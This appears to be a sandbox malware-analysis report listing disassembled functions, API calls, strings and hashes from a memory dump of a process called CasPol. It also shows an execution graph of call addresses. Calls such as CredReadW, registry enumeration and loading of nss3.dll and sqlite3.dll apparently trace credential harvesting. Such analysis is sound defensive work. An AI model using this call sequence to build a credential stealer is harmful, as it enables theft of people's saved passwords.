                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _ultoasprintf
                                                                                                                                                                                    • String ID: %s %s %s
                                                                                                                                                                                    • API String ID: 432394123-3850900253
                                                                                                                                                                                    • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                                                    • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                                                                    • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                                                                    Function 00409901 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00409919
                                                                                                                                                                                    • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                                                    • String ID: N\@
                                                                                                                                                                                    • API String ID: 568519121-3851889168
                                                                                                                                                                                    • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                                                                                    • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                                                                                                                                    Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                    • String ID: menu_%d
                                                                                                                                                                                    • API String ID: 1129539653-2417748251
                                                                                                                                                                                    • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                    • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                                                                    • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                                                                    Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _msizerealloc
                                                                                                                                                                                    • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                    • API String ID: 2713192863-2134078882
                                                                                                                                                                                    • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                    • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                                                                    • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                    • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                                                                                    Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                                                                                                    • strrchr.MSVCRT ref: 00409808
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                    • String ID: _lng.ini
                                                                                                                                                                                    • API String ID: 3334749609-1948609170
                                                                                                                                                                                    • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                                                    • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                                                    • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                                                                                                    Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                    • String ID: sqlite3.dll
                                                                                                                                                                                    • API String ID: 1983510840-1155512374
                                                                                                                                                                                    • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                                                    • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                                                    • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                                                                                    Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileString
                                                                                                                                                                                    • String ID: A4@$Server Details
                                                                                                                                                                                    • API String ID: 1096422788-4071850762
                                                                                                                                                                                    • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                    • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                                                                    Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                                                                    • memset.MSVCRT ref: 0042C932
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                    • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                    • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                                                                                                    Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040849A
                                                                                                                                                                                    • memset.MSVCRT ref: 004084D2
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,770145ED,?,00000000), ref: 0040858F
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,770145ED,?,00000000), ref: 004085BA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3110682361-0
                                                                                                                                                                                    • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                    • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                                                    • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                    • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                                                    Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3510742995-0
                                                                                                                                                                                    • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                    • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                                                    • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                                                                                    Function 0040998E Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                    • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                    • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                                                                                                    • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                                                                                                    Function 0040796E Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                                    • free.MSVCRT ref: 0040799A
                                                                                                                                                                                      • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                      • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                      • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                    • free.MSVCRT ref: 004079BD
                                                                                                                                                                                    • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3669619086-0
                                                                                                                                                                                    • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                    • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                                                                    • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                    • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:13.8%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                                                                                    Signature Coverage:2.7%
                                                                                                                                                                                    Total number of Nodes:1726
                                                                                                                                                                                    Total number of Limit Nodes:46
                                                                                                                                                                                    execution_graph 6624 413d44 6627 413d1e 6624->6627 6626 413d4d 6628 413d27 _onexit 6627->6628 6629 413d2d __dllonexit 6627->6629 6628->6629 6629->6626 8686 4140c4 8689 413d44 8686->8689 8690 413d1e 2 API calls 8689->8690 8691 413d4d 8690->8691 8126 405b5a 8127 405b72 8126->8127 8128 405c39 8126->8128 8130 405b82 memset 8127->8130 8134 405be7 8127->8134 8158 402c27 8128->8158 8140 40876f 8130->8140 8134->8128 8138 405c28 _mbscpy 8134->8138 8135 40876f 12 API calls 8136 405bb5 sprintf 8135->8136 8137 405bdd 8136->8137 8153 412396 SHGetMalloc 8137->8153 8138->8128 8141 408778 8140->8141 8142 40877d 8140->8142 8162 4086ed 8141->8162 8144 405bac 8142->8144 8145 4087e0 _mbscpy 8142->8145 8146 4087ad 8142->8146 8144->8135 8165 408bf9 _itoa 8145->8165 8147 408838 LoadStringA 8146->8147 8149 408842 8147->8149 8149->8144 8152 408863 memcpy 8149->8152 8151 408802 strlen 8151->8146 8151->8149 8152->8144 8154 4123b0 SHBrowseForFolder 8153->8154 8156 412406 8153->8156 8155 4123e4 SHGetPathFromIDList 8154->8155 8154->8156 8155->8156 8157 4123f6 _mbscpy 8155->8157 8156->8134 8157->8156 8159 402c5b 8158->8159 8160 402c34 8158->8160 8160->8159 8161 402c4b EndDialog 8160->8161 8161->8159 8163 4086f6 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 8162->8163 8164 40876e 8162->8164 8163->8164 8164->8142 8168 408c31 8165->8168 8167 4087fb 8167->8146 8167->8151 8169 414060 8168->8169 8170 408c3e memset GetPrivateProfileStringA 8169->8170 8171 408c87 _mbscpy 8170->8171 8172 408c9d 8170->8172 8171->8167 8172->8167 6011 411e70 6014 411d37 6011->6014 6013 411e90 6015 411d43 6014->6015 6016 411d55 GetPrivateProfileIntA 6014->6016 6019 411c43 memset _itoa WritePrivateProfileStringA 6015->6019 6016->6013 6018 411d50 6018->6013 6019->6018 6630 40f105 6631 40f117 6630->6631 6632 40f12a 6630->6632 6631->6632 6839 40e54d 6631->6839 6633 40f136 6632->6633 6673 40da79 6632->6673 6636 40f14c 6633->6636 6850 40dfd9 6633->6850 6637 40f167 6636->6637 6862 40e0a1 6636->6862 6639 40f173 6637->6639 6707 40e725 6637->6707 6642 40f191 6639->6642 6720 40260a 6639->6720 6644 40f1af 6642->6644 6731 402834 6642->6731 6646 40f1bb 6644->6646 6875 40eb3d 6644->6875 6648 40f1c9 6646->6648 6892 40ea56 6646->6892 6650 40f1e7 6648->6650 6651 40f1cf 6648->6651 6653 40f1f2 6650->6653 6743 40d9b9 memset memset 6650->6743 6909 40efc1 6651->6909 6656 40f1fe 6653->6656 6750 40d935 memset GetWindowsDirectoryA GetVolumeInformationA 6653->6750 6657 40f232 6656->6657 6755 407f7e 6656->6755 6661 40f250 6657->6661 6785 410b95 memset memset 6657->6785 6658 40efc1 34 API calls 6658->6650 6664 40f26f 6661->6664 6796 410f07 6661->6796 6667 40f27f 6664->6667 6811 40f09c memset 6664->6811 6821 40e675 memset 6667->6821 6923 40fd01 memset memset 6673->6923 6675 40dab7 RegOpenKeyExA 6678 40daa9 6675->6678 6676 40daed RegOpenKeyExA 6676->6678 6678->6675 6678->6676 6680 40db7b RegOpenKeyExA 6678->6680 6683 406958 strlen memcpy 6678->6683 6924 40ff88 6678->6924 6979 40fe5d RegQueryValueExA 6678->6979 6681 40dbaf 6680->6681 6682 40db95 6680->6682 6685 40dc11 RegOpenKeyExA 6681->6685 6686 406958 2 API calls 6681->6686 6992 40fd2e RegQueryValueExA 6682->6992 6683->6678 6687 40dc45 6685->6687 6688 40dc2b 6685->6688 6689 40dbe0 6686->6689 6692 406958 2 API calls 6687->6692 6701 40dc89 6687->6701 6690 40fd2e 9 API calls 6688->6690 6691 406958 2 API calls 6689->6691 6690->6687 6693 40dbf3 6691->6693 6695 40dc76 6692->6695 6693->6685 6697 406958 2 API calls 6695->6697 6697->6701 6700 40dcd8 7005 404ce0 6700->7005 6939 4103f1 6701->6939 6705 404ce0 FreeLibrary 6706 40dce8 6705->6706 6706->6633 7333 411d68 RegOpenKeyExA 6707->7333 6709 40e744 6710 40e8f3 6709->6710 6711 40e74f memset memset memset memset 6709->6711 6710->6639 7334 411dee RegEnumKeyExA 6711->7334 6713 40e7c5 sprintf 6715 411dae 3 API calls 6713->6715 6714 40e8ea RegCloseKey 6714->6710 6718 40e7bd 6715->6718 6716 40e803 strlen 6716->6718 6718->6713 6718->6714 6718->6716 6719 40e85b _mbscpy _mbscpy 6718->6719 7335 411dee RegEnumKeyExA 6718->7335 6719->6718 6721 406b2a GetVersionExA 6720->6721 6722 40261a 6721->6722 6723 402622 RegOpenKeyExW 6722->6723 6724 40272a 6722->6724 6723->6724 6725 402646 memset memset 6723->6725 6724->6642 6726 40270a RegEnumValueW 6725->6726 6727 402721 RegCloseKey 6726->6727 6728 4026a8 wcscpy 6726->6728 6727->6724 7336 40244d memset WideCharToMultiByte 6728->7336 7343 411d68 RegOpenKeyExA 6731->7343 6733 402850 6734 4028e3 6733->6734 6735 40285b memset 6733->6735 6734->6644 7344 411dee RegEnumKeyExA 6735->7344 6737 4028dc RegCloseKey 6737->6734 6739 402888 6739->6737 7345 411d68 RegOpenKeyExA 6739->7345 7346 402730 6739->7346 7353 411dee RegEnumKeyExA 6739->7353 7354 413735 memset 6743->7354 6746 406958 2 API calls 6747 40da40 6746->6747 6748 406958 2 API calls 6747->6748 6749 40da53 6748->6749 6749->6653 7439 40d794 6750->7439 6753 40d9b3 6753->6656 6754 40d794 24 API calls 6754->6753 6756 407f8b 6755->6756 7468 407c79 11 API calls 6756->7468 6760 407fa8 6761 407fb3 memset 6760->6761 6762 408077 6760->6762 7471 411dee RegEnumKeyExA 6761->7471 6773 407bc6 6762->6773 6764 408072 RegCloseKey 6764->6762 6766 407fe4 6766->6764 6767 408006 memset 6766->6767 7472 411d68 RegOpenKeyExA 6766->7472 7486 411dee RegEnumKeyExA 6766->7486 6768 411d82 RegQueryValueExA 6767->6768 6770 408039 6768->6770 7473 407e33 strlen 6770->7473 7487 411d68 RegOpenKeyExA 6773->7487 6775 407be4 6776 407c73 6775->6776 6777 407bef memset 6775->6777 6776->6657 7488 411dee RegEnumKeyExA 6777->7488 6779 407c6e RegCloseKey 6779->6776 6781 407c1d 6781->6779 7489 411d68 RegOpenKeyExA 6781->7489 7490 407a93 memset RegQueryValueExA 6781->7490 7503 411dee RegEnumKeyExA 6781->7503 6786 41223f 10 API calls 6785->6786 6787 410be4 strlen strlen 6786->6787 6788 410c07 6787->6788 6790 410c1a 6787->6790 6789 406b4b 4 API calls 6788->6789 6789->6790 7504 4069d3 GetFileAttributesA 6790->7504 6792 410c31 6793 410c45 6792->6793 6794 410c36 6792->6794 6793->6661 7505 410ac5 6794->7505 7557 411d68 RegOpenKeyExA 6796->7557 6798 410f25 6799 410f30 memset 6798->6799 6800 411025 6798->6800 7558 411dee RegEnumKeyExA 6799->7558 6800->6664 6802 41101c RegCloseKey 6802->6800 6804 410f7f memset 6806 411d82 RegQueryValueExA 6804->6806 6807 410f5d 6806->6807 6807->6802 6807->6804 6808 411d82 RegQueryValueExA 6807->6808 6810 410ff3 RegCloseKey 6807->6810 7559 411d68 RegOpenKeyExA 6807->7559 7560 410e85 strlen 6807->7560 7562 411dee RegEnumKeyExA 6807->7562 6808->6807 6810->6807 6812 41223f 10 API calls 6811->6812 6813 40f0db 6812->6813 6814 406efe 3 API calls 6813->6814 6815 40f0e5 6814->6815 7563 4069d3 GetFileAttributesA 6815->7563 6817 40f0ee 6818 40f0f3 6817->6818 6819 40f0ff 6817->6819 7564 405ae8 6818->7564 6819->6667 7590 40f9a0 6821->7590 6824 40e6bc 7603 4064fb 6824->7603 6829 40e5d3 6830 40e5e9 6829->6830 6831 407364 7 API calls 6830->6831 6832 40e644 6831->6832 7772 4085b9 6832->7772 6836 40e661 7790 40819f 6836->7790 7871 40e4b6 memset strlen strlen 6839->7871 6841 40e5cb 6841->6632 6843 40783b 9 API calls 6848 40e592 6843->6848 6844 407898 9 API calls 6844->6848 6845 40e5c0 6847 407930 FindClose 6845->6847 6846 407800 2 API calls 6846->6848 6847->6841 6848->6844 6848->6845 6848->6846 6849 40e54d 33 API calls 6848->6849 6849->6848 6851 40e012 6850->6851 6853 40e05d 6851->6853 6854 40e031 6851->6854 7896 40dd65 6851->7896 6853->6636 6855 40783b 9 API calls 6854->6855 6860 40e05b 6855->6860 6856 407898 9 API calls 6856->6860 6857 40e08e 6859 407930 FindClose 6857->6859 6858 407800 2 API calls 6858->6860 6859->6853 6860->6856 6860->6857 6860->6858 6861 40dfd9 30 API calls 6860->6861 6861->6860 6863 414060 6862->6863 6864 40e0ae memset strlen strlen 6863->6864 6865 40e0fe GetPrivateProfileIntA 6864->6865 6866 40e0eb 6864->6866 6869 40e28c 6865->6869 6874 40e12e 6865->6874 6868 406b4b 4 API calls 6866->6868 6868->6865 6869->6637 6870 40e133 8 API calls 6870->6874 6871 4029d9 strlen 6871->6874 6872 40dcf2 strtoul 6872->6874 6873 406958 strlen memcpy 6873->6874 6874->6869 6874->6870 6874->6871 6874->6872 6874->6873 6876 40ec1a 6875->6876 6877 40eb5c memset strlen strlen 6875->6877 6876->6646 6878 40eb93 6877->6878 6879 40eba9 6877->6879 6880 406b4b 4 API calls 6878->6880 6879->6876 7915 4069d3 GetFileAttributesA 6879->7915 6880->6879 6882 40ebc8 6882->6876 7916 412d65 6882->7916 6886 40ebfd 6887 40ec0f 6886->6887 7937 412f4b 6886->7937 7957 412e4d 6887->7957 6893 40eb33 6892->6893 6894 40ea75 memset strlen strlen 6892->6894 6893->6648 6895 40eac2 6894->6895 6896 40eaac 6894->6896 6895->6893 8008 4069d3 GetFileAttributesA 6895->8008 6897 406b4b 4 API calls 6896->6897 6897->6895 6899 40eae1 6899->6893 6900 412d65 6 API calls 6899->6900 6901 40eaf1 6900->6901 6902 412f02 6 API calls 6901->6902 6903 40eb16 6902->6903 6904 40eb28 6903->6904 6905 412f4b 12 API calls 6903->6905 6906 412e4d 9 API calls 6904->6906 6907 40eb21 6905->6907 6906->6893 6908 40d1a5 22 API calls 6907->6908 6908->6904 6910 40f093 6909->6910 6911 40efd6 6909->6911 6910->6658 6912 40783b 9 API calls 6911->6912 6913 40effd 6912->6913 6914 407898 9 API calls 6913->6914 6919 40f008 6914->6919 6915 40f088 6916 407930 FindClose 6915->6916 6916->6910 6917 407898 9 API calls 6917->6919 6919->6915 6919->6917 6921 40f076 CloseHandle 6919->6921 6922 40f05d CloseHandle 6919->6922 8009 4067ba CreateFileA 6919->8009 8010 40f8a8 6919->8010 6921->6919 6922->6919 6923->6678 7008 404109 6924->7008 6931 40ffc3 CredReadW 6934 410085 6931->6934 6935 40ffda 6931->6935 6932 404ce0 FreeLibrary 6933 41009c 6932->6933 6933->6678 7024 404170 6934->7024 6935->6934 6936 41003a WideCharToMultiByte 6935->6936 6937 410061 WideCharToMultiByte 6936->6937 6938 41007a LocalFree 6936->6938 6937->6938 6938->6934 6940 414060 6939->6940 6941 4103fe RegOpenKeyExA 6940->6941 6942 40dcc1 6941->6942 6943 410428 RegOpenKeyExA 6941->6943 6953 410205 6942->6953 